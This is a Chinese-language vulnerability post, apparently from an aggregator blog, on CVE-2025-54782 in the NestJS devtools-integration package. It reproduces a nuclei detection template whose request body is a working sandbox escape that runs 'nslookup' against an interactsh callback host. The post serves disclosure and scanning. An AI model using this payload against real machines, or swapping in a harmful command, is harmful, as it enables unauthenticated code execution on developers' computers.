NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞信息

漏洞名称: NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-54782

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: NestJS是一个用于构建高效、可扩展的Node.js服务器端应用程序的框架。@nestjs/devtools-integration是NestJS的一个开发工具集成包,旨在为开发者提供便利的开发体验。该包在版本0.2.0及之前暴露了一个本地开发HTTP服务器,其中包含一个API端点(/inspector/graph/interact),该端点使用了一个不安全的JavaScript沙箱。由于沙箱的不当实现和缺少跨源保护,任何恶意网站都可以在访问该网站的开发者本地机器上执行任意代码。这种漏洞的技术根源在于对用户输入的不当处理,以及缺乏足够的安全措施来防止跨站请求伪造(CSRF)攻击。此漏洞的严重性在于它允许远程攻击者在无需任何认证的情况下,通过诱导开发者访问恶意网站,即可在开发者的本地机器上执行任意命令,可能导致数据泄露、服务中断或其他恶意活动。由于NestJS的广泛使用,此漏洞的影响范围可能非常广泛,尤其是在开发环境中。

产品厂商: NestJS

产品名称: @nestjs/devtools-integration

影响版本: <= 0.2.0

来源: https://github.com/projectdiscovery/nuclei-templates/blob/a0b450d9298633d912d31f0ef0cbefa003a79d2d/http%2Fcves%2F2025%2FCVE-2025-54782.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

id: CVE-2025-54782

info:
  name: NestJS DevTools Integration - Remote Code Execution
  author: SeongHyeonJeon[nukunga]
  severity: critical
  description: |
    The @nestjs/devtools-integration package <= 0.2.0 is vulnerable to a Remote Code Execution (RCE) vulnerability.
    The package exposes a local development HTTP server with an API endpoint (/inspector/graph/interact) that uses an unsafe JavaScript sandbox.
    Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.
  reference:
    - https://socket.dev/blog/nestjs-rce-vuln
    - https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54782
  classification:
    cvss-metrics: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 9.4
    cve-id: CVE-2025-54782
    cwe-id: CWE-77, CWE-352, CWE-78
  tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth

http:
  - method: POST
    path:
      - "{{BaseURL}}/inspector/graph/interact"
    headers:
      Content-Type: "text/plain"
    body: |
      {"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 200

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
NestJS DevTools Integration Remote Code Execution Vulnerability
http://example.com/2025/08/03/github_658324702/
作者
lianccc
发布于
2025年8月3日
许可协议